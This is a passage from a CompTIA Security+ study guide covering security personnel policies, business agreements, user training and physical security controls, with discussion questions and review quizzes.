Ethics Even beyond verifying compliance with the letter of every agreement, HR should take a
leadership role in promoting a code of ethics for the organization. Employees should be
expected to be honest, responsible, and legal in their work activities even where there isn't a
rule to cover the specific situation. They should also be encouraged to come to management
with any ethical questions. Employees and managers that keep to an ethical code are less
likely to compromise the organization's security or reputation.

Secure personnel policies


In any organization, many of the biggest threats are on the inside. A malicious employee given too much trust
can easily cause more damage than an outside attacker, and even a well-meaning but careless and lazy worker
can make mistakes that compromise the whole company. On the other extreme, even an excellent employee
can be a risk—what will you do if something happens to that tireless and multi-talented technician who's the
only one that understands how the whole network fits together?

Exam Objective: CompTIA SY0-501 4.4.2.1, 4.4.2.6, 5.1.3.1, 5.1.3.2, 5.1.3.3, 5.1.3.4
Technical controls like monitoring can't solve all of these problems, and too much suspicion can make for an
unhealthy work environment anyway. Fortunately, the most useful policies for finding employee dishonesty or
mistakes are also ideal for other purposes, and when they're applied consistently and impersonally no one has
cause to feel singled out. Additionally, knowing that normal procedures are likely to catch policy violations
will reduce the temptation of employees to cheat or get lazy.


Least privilege Employees should only be given permissions needed to perform their regular duties:
this not only limits the damage that can be done by malicious behavior or human
error, but also the damage done by an attack that compromises that employee's account. In
particular, administrators should always have ordinary user accounts with normal
privileges for everyday tasks, and only use administrative credentials for tasks that
actually require them. Determining exactly what permissions a given employee
needs might require input from a combination of department managers and system
administrators.
Mandatory vacations Employees should not only receive vacation time, but be required to take it. It's not
just a matter of preventing burnout: employees committing fraud or embezzlement
frequently refuse optional vacations since someone else taking over their duties
might notice what they've been doing. Even when there's no wrongdoing, having a
critical employee out of the office for a week makes sure you have some
combination of people who can fill in when necessary.
Rotation of duties Very similar to mandatory vacations, it's a good idea to rotate tasks and
responsibilities regularly between multiple qualified employees. This way, each
employee will naturally notice any mistakes or irregularities caused by the previous
person to handle the job. It has the side benefit of making sure that employees are
amply experienced in a wider variety of responsibilities.
Separation of duties It's tempting to put a long and complex process in the hands of a single skilled
employee who can see it through from start to finish, but it's not always a good idea.
Breaking sensitive processes up into multiple tasks which are each performed by a
different person prevents fraudulent activity by a single employee from going
undetected. Even without fraud coming into play, it allows each employee to spot
mistakes made by others.
Recertification All user privileges and credentials, especially but not limited to user accounts,
should be subject to a regular review and approval process. Not only should you
remove or disable accounts that are inactive or no longer needed, but you should
make sure active users still have least privilege permissions for their current job
duties. Account review can be automated in part by use of identity management
tools; a brief example appears after this table.
Clean desk policy Keeping a literal clean desk in a customer-facing position is good for company
image, but in security terms a clean desk policy is about keeping information from
where just anyone can get a hold of it. Literal things on desks are still a factor:
papers, keys, access cards, and storage devices should be out of sight and
appropriately secured when not attended. Beyond that, filing cabinets should be
locked, mobile devices secured, and workstations locked when their user is not
present. Some assets might be more strictly secured than others.

Asset management
IT assets include all hardware and software components important to your infrastructure.
 Computers and network appliances
 Peripherals and other devices
 Data and storage media
 Software and software licenses
 Supporting infrastructure such as network cabling, HVAC systems, and server rooms.


Exam Objective: CompTIA SY0-501 1.6.13, 2.3.13


Assets don't only have intrinsic value: each can also be used as a vector for attackers to compromise the rest
of your organization. It's essential that you have asset management policies that make sure all assets are
documented and secured through their entire life cycle from acquisition to disposal. In particular,
undocumented or poorly documented hosts lead to problems with system sprawl, where underutilized and
poorly maintained systems make an ideal foothold for attack.
You can use software and hardware tools to assist in asset management, but from a policy standpoint the
important points are to make sure assets are tracked and secured appropriately, and to make sure there is a
clear path of human accountability for assets that are missing, damaged, or compromised. At any point in its
life cycle, an asset should have the following roles defined.

Owner The person ultimately responsible for the deployment and security of the asset. Typically a
management or executive position.
Custodian The person responsible for deploying and securing the asset on a technical level, in compliance
with the instructions of the owner.
User Individuals authorized to access or make use of the asset, typically under the oversight of the
custodian and always in accordance with the instructions of the owner.

Change management
One of the marks of an industrious manager, administrator, or other employee is an endless desire to find a
better way to do things. Unfortunately, this can be a disaster for security. A change that seems beneficial, even
one that actually is beneficial, might have less obvious side effects that can introduce new problems. For
example, SSDs have massive performance benefits over traditional hard drives, so an IT administrator might
want to make sure all new workstations have SSD system drives. The problem is that secure file erase and
drive wipe methods designed for hard drives, including physical degaussers, won't work right on SSDs. If
nothing else is changed, the administrator just introduced a risk of later disposing of SSDs full of sensitive
data. That's just one example: networks especially are notorious for being carefully arranged structures that
can collapse with a single well-meaning but mistaken tweak.

Exam Objective: CompTIA SY0-501 5.3.3


No sensible organization wants to stop innovation or discourage the sort of employee that has useful ideas.
Instead, it's vital to channel them through a clearly defined change management process. How long and
formal the process should be depends both on the nature of the organization and the complexity of the change,
but it should always be conducted by experts who can judge its benefits and potential impacts, and it should
ask questions that will help the reviewers decide whether to approve, deny, or request modifications to the
change.
 Does the change have a meaningful benefit?
 What side effects, good and bad, will it have?
 How hard will it be to implement?
 How can any newly introduced risks be managed?

Documenting approved changes is as important as approving them in the first place. The change itself needs
to be recorded along with the results of its review process. Any policies or procedures affected by the change
need to be updated as well, and personnel trained accordingly.


Discussion: Security policies


For this discussion, have an existing security policy document on hand. It can be one from your organization,
one supplied by your instructor, or one found online.
1. How does each element of the policy document further overall organizational security goals?
Answers may vary.
2. What changes would you make to the policy to increase security?
Answers may vary.
3. Why would a CEO, a network technician, and a sales representative each need to refer to a very different
security policy document?
There are a number of possible reasons. One important one is technical knowledge: an end user or
manager might not understand the details of a policy meant for network technicians. Another is company
role: the technician needs policies for administering network functions, the CEO needs them to
understand the company's security needs on a strategic level, and a sales representative needs them to
practice secure user behaviors. A third is security in itself: security policies themselves are sensitive
information, and should be kept to those who need to know them.
4. What security lapses have you seen that were likely due to missing or unclear policies?
Answers may vary. Even leaving out cases where a policy was written but not communicated, common
problems include unwritten rules, failure to specify best practices, failure to assign responsibility for
security procedures, or failure to update policies as needs change.

Business agreements
Security isn't only impacted by employee activities: any time your organization enters in a business agreement
to share data or integrate systems with another, or even contract an outside party to do work involving access
to company assets and customer data, security could be compromised. At the least, some aspects of security
will be put outside your organization's control, and the same is true of your business partner. It's even more
complicated if you, or your partner, have existing agreements with other organizations.

Exam Objective: CompTIA SY0-501 5.1.2, 5.1.3.6


Interoperability agreements rely on mutual trust and technical understanding of each other's systems, but
those alone leave a lot of questions. Data ownership is one: who is responsible for maintaining backups of
that shared database? Privacy is another: who in both organizations is allowed to access the database, and how
will it be secured from unauthorized access? To preserve security of both parties' assets, the agreement must
answer these questions in the form of policy statements. These policies need to be enforced not only by
security controls in both organizations, but by mutually binding legal documents.
Some business agreements are standardized, take-it-or-leave-it policies similar to user agreements within the
organization: unless you're an enormous company, when you contract with an ISP you're probably going to
get the same standard customer policy every similar business does, and just need to read and agree with it.
Other agreements are custom contracts, where all involved parties need to negotiate their mutual needs and
find agreement. Regardless of which type a contract is, as a security professional you need to understand the
risks the agreement creates, and how it affects your and your organization's responsibilities.
The interoperability agreements usually designed and negotiated by management and legal staff can seem like
a confusing jumble of acronyms when you're new to them, but it's important to distinguish between common
types and recognize how they can affect security.


Service-level agreement (SLA): A formal definition of a service provided to or by the organization, typically including expectations for performance, reliability, and other service metrics. For example, a cloud provider's SLA would specify their minimum obligations for availability, performance, and data security, along with their liabilities if they cannot meet the agreement. The SLA may be supplemented by more specific operational-level agreements (OLAs).

Memorandum of understanding (MOU): A less formal agreement of mutual goals between two or more organizations, commonly used when a formal contract has not been completed or would not be appropriate. Sometimes synonymous with a letter of intent. The MOU may or may not be legally binding depending on its terms, but it should shape company policy as though it were.

Interconnection security agreement (ISA): A security-focused document that specifies the technical and security requirements involved in creating and maintaining a secure connection between two parties, usually in support of an existing MOU. Typically an ISA describes connection requirements, what security controls will be used, and a topological map of the connection.

Business partnership agreement (BPA): A written agreement defining the general relationship between business partners. At the least, it defines how each organization shares profits, losses, property, and liability; it also defines partners' responsibilities to each other, and a dissolution process for if and when any partner leaves the agreement. Most of a BPA is standard terms applicable to any business venture, but where informational assets are involved there might be provisions relating to their security either in the BPA itself or in related agreements.

Non-disclosure agreement (NDA): A legal agreement that outlines proprietary or otherwise confidential information that will be shared between two or more parties, and may not be disclosed. It may be one-way to protect information one party owns and shares with others, or two-way to share information passing in both directions. As well as business partners, employees might have to sign NDAs or similar documents as part of their onboarding process.


Third-party security concerns


As if it weren't hard enough to make security responsibilities and liabilities clear in two-party agreements with customers or business partners, in practice third parties are likely to come into the picture, further complicating
matters. For example, imagine that your company collects quite a bit of sensitive customer data as part of its
normal services. Their terms of service with you clearly say what you collect and specify your obligations to
keep that data private and secure, and so far it's been simple enough. But now you're adding a big new web
application, and part of that is contracting a high-capacity datacenter to host it along with your customer
database. You've also hired an external developer to customize and set up the application, and support it at
least through the initial rollout period. Both of these parties will have at least some access to data—even if
you trust them and have contracts with them, guaranteeing the privacy of your customers' data just got more
complicated.
To maintain security, you need to be aware of the new risks you face, and recalculate your security needs
based on these agreements. It isn't just a matter of whether the third parties are trustworthy: you need to know
if they're using comparable data security measures to your own, who has custody of which data at what time,
how it's going to be kept safe in transit, and how you're going to reassure worried customers about their
privacy.
When you enter into agreements that involve third parties, you need to take these risks into account.

Onboarding/Offboarding: Just like adding employees, you need a process to add business partners to your systems and data. They'll need to be securely given credentials, and you'll want to be sure that your partners treat them with the same security any other account holder would. Likewise, when a business agreement ends, there needs to be a process for removal of credentials and return or destruction of data.

Data ownership: It's important to keep it clear exactly who owns and does not own shared or hosted data, as well as who has responsibility for maintaining backups. While the contract should clearly specify the details, typically third parties do not own data they host, use, or transport. This means they're not allowed to share or distribute it, and must destroy their copies after the agreement ends. Some third-party companies, especially consumer-oriented cloud services, might expect to have ownership of data they host: be sure to read agreements carefully.

Data sharing: Third parties that don't own data aren't allowed to share it, but it's harder to spot unauthorized data sharing with third parties than it is on your own systems. Even with trusted third parties, it's important to apply least privilege and need-to-know principles, minimizing the chance of sensitive data falling into the wrong hands in case they're compromised by an attacker.

Data security: Before entering into an agreement, you need to make sure other parties' security procedures meet the standards of your own, and vice-versa. Once the agreement begins you still need to adhere to all security policies, and if necessary update them to reflect the new interoperation agreement.

Privacy considerations: Entering a third-party agreement doesn't release you from obligations to protect customer privacy, especially when it comes to PII or other legally protected information. The contract, and your communications with the third party, should stress their obligations to protect the data's privacy. NDAs are important contracts in guaranteeing privacy.

Review processes: Before finalizing a third-party contract, you need to examine it alongside existing contracts and regulations related to the affected data. For example, some government or medical organizations may be forbidden from storing certain data on cloud services. Separate from that, the agreement should have provisions for mutual review processes and coordination guidelines, to make sure all parties are keeping to the security agreements.


Adverse actions
It's common for businesses and government organizations to conduct credit checks, criminal background
checks, medical evaluations, or other research into someone's history before giving them access to financial
resources, valuable data, or other benefits. For instance, if you hire an employee or promote them to a position where they'll handle sensitive data, it's generally a sound (and legal) practice to know whether they have a criminal past or debts that put them at high risk of compromising valuable assets. You should perform similar research on another business before a purchase or merger. Some such checks might even be
regulatory requirements as well as good business practice, but they have to be performed in accordance with
well-defined policies to be lawful and effective.

Exam Objective: CompTIA SY0-501 5.1.3.10


An adverse action is the legal term for any time a business performs such a check on an individual (or
sometimes another business) and denies the requested benefit - employment, promotion, credit, or anything
else it would have given them if the check came back clean. Adverse actions are subject to a variety of laws
and regulations, for example to prevent unfair discrimination in hiring and lending practices. In any situation
where your organization might take adverse actions, you need to implement policies that follow those
regulations. Areas to specify include:
 What checks can or must be performed in relation to what benefits
 Reporting requirements, both to the subject of the adverse action and to applicable regulatory bodies
• Exactly what must be reported and to whom
• How quickly the action must be reported
 Privacy requirements for performance or results of the background check
 Remedies the subject can pursue in order to dispute or correct check results

Social media risks


Social media is everywhere these days. You probably have accounts on multiple services, and odds are your
organization does as well. They're a wonderful tool for people to keep in touch, and for businesses to
communicate with their customers, but they're also full of security or public relations risks.

Exam Objective: CompTIA SY0-501 2.3.9.4, 2.3.9.5, 5.1.4


To begin with, consider any social media accounts actually associated with your company. Who has control of
them? It's a case where account sharing might actually make sense, for example if multiple people make
updates to the company Facebook page. A company social media account probably won't, or at least shouldn't, have much in the way of sensitive information, but an inside or outside vandal who gets control of it could
damage your reputation. Even accidents by well-meaning employees can lead to publicity scandals: several
years ago, the official Red Cross Twitter account sent a tweet about plans to go drinking with friends, which
had been intended for an employee's personal account. Another time an airline responded to a customer
complaint with an inappropriate and offensive image, which had accidentally been copied and pasted from
another tweet. Both turned out to be more embarrassing than actually damaging, but they're a sign of the
mistakes that can happen.
Personal social media accounts can be a concern to employers as well, for a few reasons.
 Employee use of social media from work can be time-consuming. If they're using company machines
and networks for access they could introduce malware as well.
 Social media sites often use single-sign on systems with shared credentials among multiple servers: for
example, there are many online services that let you sign on using your Facebook password. This can
potentially introduce risks of data leaks or phishing attacks.


 Users don't like to remember long lists of passwords, and this applies to personal as well as work
accounts. Many employees will use the same passwords for personal online accounts that they do for
work, allowing anyone who learns the former to guess the latter.
 Employee postings about work, or containing workplace photos, can reveal sensitive information about
business operations, security controls, or other things that can be useful to an attacker.
 Even personal matters in employee postings are commonly used in social engineering attacks. Personal
knowledge learned from a social media account is valuable for an attacker trying to build trust, and
information like the name of someone's pet or their educational history can be used to guess weak passwords or
website security questions.
 Employee personal behaviors can be a liability for their employers: illegal or offensive behavior by an
employee can reflect badly on their company, especially when it's someone prominent in the
organization. If someone ends up in the news for online harassment, and the offending posts are
interspersed with ones from your office, it will at best look bad and at worst raise legal questions about
whether the company knew about the illegal behavior.

Closely related to social media is the use of personal email. It has most of the same problems as social media
use. Personal email is especially risky as a vector for malware when it's accessed on computers also used for
work. It's also very easy for employees to get in the habit of using a personal email account for business
purposes, or vice-versa.
Policies and guidelines are important in fixing all of these issues. Corporate accounts should be tightly
controlled, and policies should address both how employees can use social media during business hours, and
what sort of work-related information is permissible on social media. Employee training should also cover
how social media is used in social engineering. Just how much control an employer should have over the
personal lives, including social media activity, of employees is a privacy issue that's widely debated, so there
aren't clear policy standards. On the other hand, personal social media activity is already widely used by employers: many use it in the hiring process, looking for potential
problems in an applicant's public postings.

Discussion: Business agreements


1. What business agreements have you had to read or work with in the past?
Answers may vary, but most people have dealt with some sort of SLA.
2. How do cloud providers fit into secure business agreements?
Not only are they partners you need to have clear contracts with to define security responsibilities, they
also are often third parties who handle sensitive customer data directly or indirectly.
3. Look online for interconnection security agreement guidelines, and note their typical concerns.
Results may vary. One useful source is NIST Special Publication 800-47.
4. Look online for business partnership agreement templates, and note their typical contents.
Results may vary.


Assessment: Security policies


1. What policy document generally describes mutual goals between organizations? Choose the best
response.
 BPA
 ISA
 MOU
 SLA

2. Which policy is focused on preventing data loss? Choose the best response.
 AUP
 Clean desk policy
 Mandatory vacation
 Separation of duties

3. Experts agree that very demanding password policies are the best way to maintain security. True or false?
 True
 False

4. What are the benefits of a job rotation policy? Choose all that apply.
 Allows employees to discover each other's mistakes in multi-step processes
 Helps detect fraudulent activity over time
 Minimizes permissions given to any one employee
 Prevents data loss
 Trains employees more broadly

5. Your company has signed a BPA with a business partner. What most likely isn't a part of it? Choose the
best response.
 How liability is shared for a loss of shared assets
 Technical requirements for secured data connections between the two companies
 What happens to informational assets when the agreement is dissolved
 Who is responsible for maintaining informational assets


Module B: User training


Policies, procedures, and guidelines are only useful if users actually follow them, and just posting them up
where everyone can see probably isn't good enough. For that, you need a training program informing
employees of their roles and responsibilities in keeping the organization secure. Further, security training
needs to be an ongoing process: not only do you need to include it in employee orientation and when policies
or procedures change, you need to maintain ongoing communication between management, administrators,
and users regarding security issues.
You will learn:
 About role-based training
 How to train employees in handling sensitive data
 How to apply training as an ongoing process

Role-based training
Not all employees need to know all the details of the organization's security policies and goals. As important as it is for management to know that the network needs up-to-date firewalls, they don't really need or want a presentation on how to configure one. Social engineering attacks can affect anyone in the organization, but the sorts encountered by security guards and by call center workers are likely to be somewhat different. For that matter, some security procedures might be restricted information distributed on a
need-to-know basis. Role-based training programs work by tailoring training content to classes of users based
on their workplace duties and expected technical expertise.

Exam Objective: CompTIA SY0-501 1.6.8, 3.1.3.3, 5.1.3.7


Some roles found in a typical organization include the following:

End users: Any user needs to know about common threats and how to protect against them. End user training typically focuses on topics like maintaining password security, avoiding malware and suspicious links, the importance of physical security, and important regulatory compliance issues for the business type.

Customer-facing employees: Employees who deal regularly with customers, or even other outside personnel like business partners, delivery workers, and so on, need additional training in recognizing social engineering attacks and protecting the organization's reputation.

Privileged users: Users with any sort of elevated privileges have more capability to inadvertently do damage than end users, but that doesn't mean they're more technically savvy or aware about security. They need to be made aware of the extra permissions they've been given, what responsibilities come with them, and the importance of not sharing their credentials with other users.

Administrators: Network administrators and system owners need to know about technical threats facing networks and systems, and how to configure and maintain the security solutions used to contain those threats. Administrators need to be regularly kept abreast of network changes and evolving threats, and to have detailed system documentation available at all times.

Incident response teams: Personnel who respond to security incidents need to know detailed procedures related to their specific duties. Security guards need to know how to respond to physical threats, workstation troubleshooters need to know how to safely remove malware, and so on. At least someone on every incident response team needs to know forensics procedures and related legal requirements.


Management: Executives and other management have a very different security perspective from most users. Management needs to have a high-level understanding of security, focused on the assets of the organization and general classes of threat that it faces. They don't need to know all the details of security controls, but they need to know why they are in place and what could compromise them. Executives must also be aware of some specific threats, such as whaling attacks.

It's important to document the training process and to collect performance metrics afterward. To make sure all necessary training is given, ensure your training plan lists all training requirements for each employee and tracks whether each has been met. You can then use tests or simulations to verify that the training was successful.

Handling data
Users should be educated about how to handle data securely throughout its whole life cycle. Role-based
training should focus on the types of data they will handle in their normal duties, but in general they should be
aware of the importance of recognizing sensitive data and acting appropriately. Exactly what training users
should have depends on your organization's policies, but typically users should know the following:

 Data should always be classified according to its nature or sensitivity level.
• Sensitive data should always be clearly labeled or otherwise recognizable as such.
• Data should be stored only in appropriate locations for its nature and sensitivity.
• Users should have both permission and need to access sensitive data, whether technically able to or
not.
 Some types of data require special handling for contractual or regulatory reasons. This can restrict who
can view it, how it is stored and secured, and what can be done with it, so the specific details should be
covered as role-based training.
• Personally identifiable information (PII) is subject to special legal regulations, such as HIPAA
governing medical patient data in the US.
• Payment and financial data is governed by industry and legal regulations as well. For example, credit
card data must be stored by PCI-DSS standards.
• Customer and partner data must be handled in compliance with existing privacy and sharing
agreements.
 Data that isn't securely stored on a server needs special handling.
• Sensitive data shouldn't be sent over the network by insecure means. For non-technical users
guidelines might be allowed or forbidden applications, while for network administrators it might be
specific encryption standards.
• Sensitive data should never be shared outside of permitted channels. In the workplace, this includes a
clean desk policy for sensitive information.
• Mobile devices and removable storage media holding sensitive data should be encrypted and
appropriately labeled.
• Data should only be taken from the workplace as permitted, and the user must be responsible for its
physical security.
 Data and media should be disposed of appropriately to avoid dumpster diving or other scavenging
techniques.


Ongoing training
Training is an ongoing process. Not only will your organization's structure and surrounding threats change
over time, but after any sort of security incident you should consider remedial training and review your
existing training processes to see how they could have prevented it. Likewise, audits and employee
evaluations should always examine compliance with security policies, laws, and best practices.

Exam Objective: CompTIA SY0-501 5.1.3.8


Very often, maintaining security is a matter of looking back at what's habitually done wrong, and looking for ways to encourage good practices while discouraging risky behavior. Often, employees are just looking for shortcuts that make their work easier, and need to be reminded of risks when their vigilance lapses. Sometimes
the solution is repeating and enforcing training. Other problems are better fixed by evaluating outdated or
flawed policies and training procedures.
 Users are prone to choose insecure passwords. When strong passwords are enforced, they're prone to
reuse them, write them down in insecure locations, or constantly forget them. If maintaining
sufficiently secure passwords is difficult for users, you might need to work out different policies or
authentication controls.
 Similarly, users called from one task to another frequently leave data exposed: accounts still logged in,
documents left lying about, and so on. Clean desk policies and related training can help if this becomes
a problem.
 Recreational programs and websites on company networks are popular when they're not completely
forbidden, and sometimes even when they are. Users may use social media services excessively or
inappropriately, and P2P or media streaming services can hurt network performance or be used to
illegally distribute copyrighted materials. When these become a problem you should either remind
users of existing policies, or consider adding new controls. Even if you just block an offending
application, you need to explain why it was blocked to keep users from just trying to work around it.
 Personal mobile devices are only becoming more central in users' lives. If your organization doesn't
have a clearly defined mobile policy, or if restrictions on personal device use are increasingly strained
or violated by changing user behaviors, you either need to increase training and enforcement, or alter
the policy to keep device use secure.
 Users tend to be helpful to each other and to anyone not perceived as threatening. This is a social
engineering vulnerability. If users frequently hold doors for tailgaters, for example, you might need to
add more training or even physical controls like mantraps.
 Users easily get in the habit of answering legitimate-seeming questions or following legitimate-looking
links. Scams and phishing attempts often follow trends or are used on multiple targets throughout an
organization, so responding to an isolated incident with a company-wide bulletin can prevent
recurrence.
 Technicians are very prone to disable security controls as part of troubleshooting or optimization processes, and then forget to turn them back on. You might need to stress the importance of re-enabling security controls after maintenance.

Another way of maintaining security is looking ahead and watching out for new threats, then informing others
about them. Security administrators in particular, but users in general, should watch for new threat alerts or
unfamiliar attacks, and notify the rest of the organization of any new risks. In particular, it's important to
monitor for new viruses that systems might not be adequately protected against, or any other sort of zero-day
exploit which is newly discovered but not yet patched.


Discussion: User training


1. Identify job roles within your organization, and which specific fields of security training are important for
each job.
Answers may vary. For example, technical personnel need to know detailed security procedures for the
systems they manage, while customer-facing personnel need extra training on dealing with social
engineering.
2. Of your present or past jobs, which provided clear training on how to securely handle sensitive data? If
not, what was lacking?
Answers may vary.
3. Do any aspects of your organization's security policy seem out of date due to changes in technology or
user behavior?
Answers may vary.

Assessment: User training


1. What kind of security training is most important for a company executive? Choose the best response.
 Identifying malware symptoms
 Overall awareness of the organization's assets and threats to them
 Recognizing social engineering attacks
 Regular updates on evolving network threats

2. What standards do you need to use when handling credit card data? Choose the best response.
 HIPAA
 NIST
 PCI-DSS
 PKI

3. Users should have both permission and need to access sensitive data, whether technically able to or not.
True or false?
 True
 False

4. What kind of employee is most likely to need extra training about social engineering attacks? Choose the
best response.
 Department manager
 Maintenance technician
 Network administrator
 Receptionist


Module C: Physical security and safety


When discussing information security it's common to focus on technical threats and controls, with an aside about social engineering risks. These are important topics, but never forget that the lowest-tech threat, that of someone just walking in and stealing or destroying assets, hasn't gone away. In fact, it's a commonly cited rule
of thumb that once an attacker gets physical access to a system, compromising any digital security is just a
matter of time. Closely aligned with physical security are environmental controls used to prevent fires and
protect sensitive equipment, and safety controls used to protect human assets from harm.
You will learn:
 About location and facility constraints on physical security
 About surveillance systems
 How to secure entryways and equipment
 How to protect equipment and personnel with environmental controls
 About fire suppression systems

Physical access control


One reason it's easy for people not to think of information security and physical security in the same terms is
that they'll think of the former in terms of technical standards and network activities that aren't part of the "real world", and the latter as a low-tech field that, important or not, is more about protecting people and physical valuables than data. In truth they're part of a unified whole, and in principle they operate the same way. Physical controls extend beyond computers and policy statements and into the physical facilities of your organization, and can be categorized in similar ways.
Like a network, a physical facility is likely to use defense in depth, by means of multiple security zones
separated by active and passive access controls, and subject to different security restrictions. In a typical
office building there might be some security controls for the parking lot and grounds, stricter ones for the
internal office space, and most of all for the server room or other particularly valuable areas.


Physical controls can be classified like any other type. A locked door is a preventive or deterrent control that
blocks entry, while a security camera is a detective control that simply records who passes. A security guard
can do both, but as a human element can be vulnerable to social engineering and lapses of attention. Similarly,
a security alarm is designed to protect against human attackers, while a smoke detector is intended to detect "equipment malfunction" in the form of a fire. User credentials and authentication are important in physical security too; they're just more likely to be a key or ID badge than a password or digital certificate.
Just like in any other field of security, stronger physical security isn't always better—you need to tune it to
your actual needs, and implement it carefully. Access controls that are too burdensome or inconvenient for
legitimate users will hurt performance or encourage employees to creatively bypass them. Improperly
implemented physical controls can even be dangerous. For instance, if you're worried about unauthorized
visitors being let in through a back door, you might consider locking it so that it can't be opened from either
side without a key held only by the facilities manager. The problem is, that could turn deadly if it's the only
fire exit from that part of the building.

Facility and location concerns


What measures you need to take for safety and security aren't defined only by your organization's assets and
risks, but by your facility's construction and location. If your organization is having its own facility
constructed you might have a great deal of freedom in making sure the whole site is safe and easily secured;
likewise, if you're buying or renting an existing one you can look for what best suits your needs. If you're
evaluating new physical security and safety standards for an existing facility, you're likely to be considerably
more constrained: unlike a network, there are no nifty virtualization tricks that will let you avoid a complex
remodeling project.

Exam Objective: CompTIA SY0-501 3.9.1, 3.9.2, 3.9.3, 3.9.14


The location of your facility has a lot of bearing on physical security requirements, both from human and
natural causes, so you should research the area before moving into a new facility.
 High crime and vandalism rates can lead to damage or theft of physical assets, or even dangers to your
employees that you'll need to address.
 A location at risk of floods, storms, earthquakes, or other natural disasters will heighten the need for
disaster planning policies.
 Unreliable utility services such as electricity or telecommunications access will increase the need for
backup systems.
 Emergency response times can affect security and safety, especially for remote locations. If police, fire,
and ambulance services can't reach the facility quickly, both lives and property are at greater risk in
case of emergency.

The facility's physical construction and layout is critical to security: if nothing else, walls and entry points are
the most fundamental types of passive access controls, and the hardest to modify later.


 Perimeter fences or walls can be used to control how people enter the grounds themselves, but height
and construction method determine how much security they provide.

• A 3-4 foot barrier of any sort will discourage casual intruders, but not those willing to climb. High
security fences are typically 8 feet or more, and topped with barbed wire or other measures to
discourage climbing.
• To prevent intruders going under or through a fence, make sure it's sturdily constructed, hard to
disassemble, and has secure bottom rails or buried chain links.
• To prevent intruders from using vehicles to crash through barriers, install a fence with a K-rating
appropriate to your needs. K-ratings are a crash test standard designed by the US Department of
State: A K12 fence can stop a 15,000 lb. truck traveling at 50 mph.
• Sensors or cameras can detect someone trying to breach a security fence.
• Keep high grass and trees clear of the fence to aid visibility.
• Make sure that fences and gates don't block emergency access or escape routes.

 Barricades are useful for controlling vehicle traffic or directing crowds, but shouldn't be considered a
secure protection against individual intruders.


 Signs marking restricted areas are a simple deterrent control against casual or accidental intruders.
 All doors should be easily secured, and allow safe entry and exit. Emergency exits should never be
blocked or locked from the inside: instead use door alarms that signal when they're opened.
 Ensure that normal entrances can't be simply bypassed, especially to protect against after-hours
burglary.

• Make sure that windows can't be easily opened or broken to force entry. Even upper story windows
accessible from fire escapes are at risk, but don't let security block the escape route.
• Ensure that internal walls bordering secure areas go from the true floor to the true ceiling. If a wall
can be bypassed by going through the crawl space above a drop ceiling, or below a raised floor,
determined intruders can bypass a locked door or security checkpoint.
• Highly secure areas need to be protected by sturdy or reinforced walls. A drywall partition is easy to
simply smash through.
• Ventilation ducts and utility tunnels might not be the same risk in real life that they are in the
movies, but if a person can fit through one, it needs to be documented and secured just as if it were a hallway.

 Visibility and accessibility can benefit security and safety alike.

• External areas like entrances, sidewalks, parking lots, and garages should all be visible and well-lit.
Ample (but not blinding) lighting will aid surveillance, deter intruders, and protect from accidents.
• Emergency escape routes within the building should be unobstructed, clearly marked and have
battery-powered lighting to ensure safe evacuation during a power outage.

Surveillance systems
In any security system, detective controls are essential. In physical security, this role is filled by cameras and
other surveillance systems that detect and report on intrusion. Surveillance systems don't just allow you to
actively respond to security incidents, they can also document unauthorized access and help identify intruders
after the fact.

Exam Objective: CompTIA SY0-501 3.9.4, 3.9.5, 3.9.19, 3.9.20, 3.9.23


Video cameras, also known as closed-circuit television (CCTV), are one of the most popular forms of surveillance, and advances in digital video technology have made IP-based cameras and security video storage simple and inexpensive to deploy. At its simplest, you can place cameras at any entrance or location you want to monitor; depending on your needs, you might want additional features.


Many modern cameras include infrared LEDs for night vision

 Night-vision cameras can record activities in low-light conditions where normal cameras can't. Some are simply sensitive to very low levels of light. Others are sensitive to near-infrared wavelengths just outside of human vision, and contain a matching infrared light to invisibly illuminate the area. Both types generally show only black-and-white output.
 Wireless cameras using Wi-Fi or other technology can be easily placed where wiring would be
inconvenient.
 Often the visible presence of a security camera is valued as a deterrent, but hidden cameras are
preferred for some purposes, for example uncovering evidence of employee theft. Hidden cameras
should never be placed where people have a reasonable expectation of privacy, and should only be used
in compliance with local laws and employee or customer agreements.
 Motion-sensitive cameras can be set to record only when they detect motion in their field of view.
They're useful in low-traffic areas, where recording full time might waste network bandwidth or
storage space.

Note: Like any other network device, IP-based cameras need to be properly secured so that not just
anyone can log in and view your security footage. Keep their firmware updated, and use strong
passwords and encryption.
Other security systems use motion detection or other sensors to detect intrusion, then trigger an alarm.
Depending on the system, the alarm may be very audible, or silent and directed only to security personnel or
emergency services.

Motion sensor: Detects motion using active or passive infrared sensors.

Window/Door sensor: Uses an electrical circuit built into a door or window, and maintained by a special switch such as a pair of magnets. When the window or door opens, the circuit is broken and the alarm is triggered. Similar circuits can be used to detect when a fence is cut.

Pressure sensor: Detects pressure from someone walking through a protected area. Usually built into a pressure mat on the floor, such as an apparent rug or doormat, but can be buried under a floor or soil.

Glass break sensor: Detects the sound or vibration of breaking glass, such as a window it's installed in.

Environmental sensors: Detect heat, cold, moisture, or humidity. Generally used to protect sensitive equipment from environmental extremes rather than to stop intruders, but often linked into the same system.

Whatever kind of surveillance systems you use, location is everything. It's not generally practical to cover
absolutely everything, but you should focus on likely points of entry, valuable assets, and areas an intruder
will have trouble avoiding. Plan surveillance coverage to minimize blind spots or ways someone could sneak
around cameras and sensors.
Finally, don't forget that people are the most versatile, if not the most reliable, surveillance system. For high
security environments, security guards are essential: they can monitor cameras and sensors, notice oddities on their own that an automated system might miss, and provide a strong deterrent by their visible presence.
During business hours, aware employees should also be trained to recognize unauthorized visitors or signs of
intrusion.

Secure entryways
The whole point of walls, fences, and surveillance systems is to make sure that no one can pass from one
security zone to another undetected. Past that, the only way to pass between them should be a secure
entryway, whether it's a locked door, a reception desk, or a security checkpoint with armed guards. The more
entryways you need to protect, the harder security is to maintain, so when planning a facility layout you
should work to minimize entry into high security areas.

Exam Objective: CompTIA SY0-501 3.9.10, 3.9.11, 3.9.12, 3.9.13, 3.9.15, 3.9.21, 3.9.23
The most popular security method is still a locked door, but there are a lot of ways today that a door can be
secured. A given entry might use multiple methods.

Conventional locks: Standard door locks are easy to pick, but higher security models use tighter tolerances and extra security features to make them more difficult to bypass. Even those can still be
picked, but it will take more time and skill. Spring-bolt latches built into doorknobs
aren't very secure, so make sure to use deadbolts on any door locked as more than a
courtesy. Remember that there should be no locked doors on an emergency escape
route, so doors locking from both sides can be a problem.

